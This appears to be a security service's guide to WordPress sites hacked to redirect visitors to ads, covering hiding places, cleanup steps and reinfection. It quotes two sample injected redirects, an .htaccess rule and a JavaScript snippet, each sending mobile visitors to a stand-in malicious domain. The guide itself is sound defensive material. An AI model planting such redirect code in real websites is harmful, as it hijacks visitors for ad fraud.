WordPress website redirecting to ads — causes and fixes
Why is the website redirecting to ads?
Redirects to ads are one of the most common signs that a WordPress website has been hacked. Hackers inject malicious code that earns money through so-called malvertising — redirecting traffic from your website to advertising networks that pay someone. Your visitors become unwitting participants in this scheme.
Typically, the website owner is often unaware because the redirect is conditional: it works only for mobile users, only for traffic from Google, or only at certain times. When you visit the website yourself from the admin panel, everything looks normal.
Where is malicious redirect code hidden?
The code responsible for redirects may be located in several places at once:
The .htaccess file
This is the most common location. A malicious entry might look like this:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (android|mobile) [NC]
RewriteRule .* https://zlosliwa-domena.com/ [R=302,L]
Check the main .htaccess file in the public_html directory, as well as .htaccess files in the wp-content, uploads, and theme directories.
Theme PHP files (header.php, footer.php, functions.php)
Hackers inject JavaScript that performs redirects into the theme's footer or header:
<script>if(/Android|iPhone/i.test(navigator.userAgent)){window.location="https://spam.example";}</script>
The database — wp_options table
The siteurl or home option may have been changed to a foreign domain. Check in phpMyAdmin:
SELECT option_name, option_value FROM wp_options
WHERE option_name IN ('siteurl','home','admin_email');
Plugins with a backdoor
Fake or infected plugins may contain their own PHP files, which load independently of the rest of the code. Check the wp-content/plugins directory for folders you do not recognize.
How to fix redirects step by step
- Reset the .htaccess file — delete the entire file and generate a new one in WordPress settings (Settings → Permalinks → Save Changes).
- Check and restore the theme files — compare the files with the original version of the theme from the developer's website or wordpress.org.
- Scan the database — run queries to search for
script, base64, and foreign domains in option_value fields.
- Deactivate all plugins — if the redirects disappear after deactivating the plugins, one of them is the problem. Reactivate them one by one to find the culprit.
- Change passwords — FTP, database, admin panel, and hosting.
Why do redirects come back?
Many website owners remove the visible code and the problem disappears for a few days — then it returns. The reason is simple: hackers usually leave more than one backdoor. You remove one point of entry, but another file on the server restores the malicious code in the meantime.
That is why effectively treating redirects requires a full audit of all files on the server — not just those visible over FTP, but also files hidden in tmp, cache, or sessions directories.
If the problem comes back, submit your website for analysis. We check every file, every database record, and every line of server logs.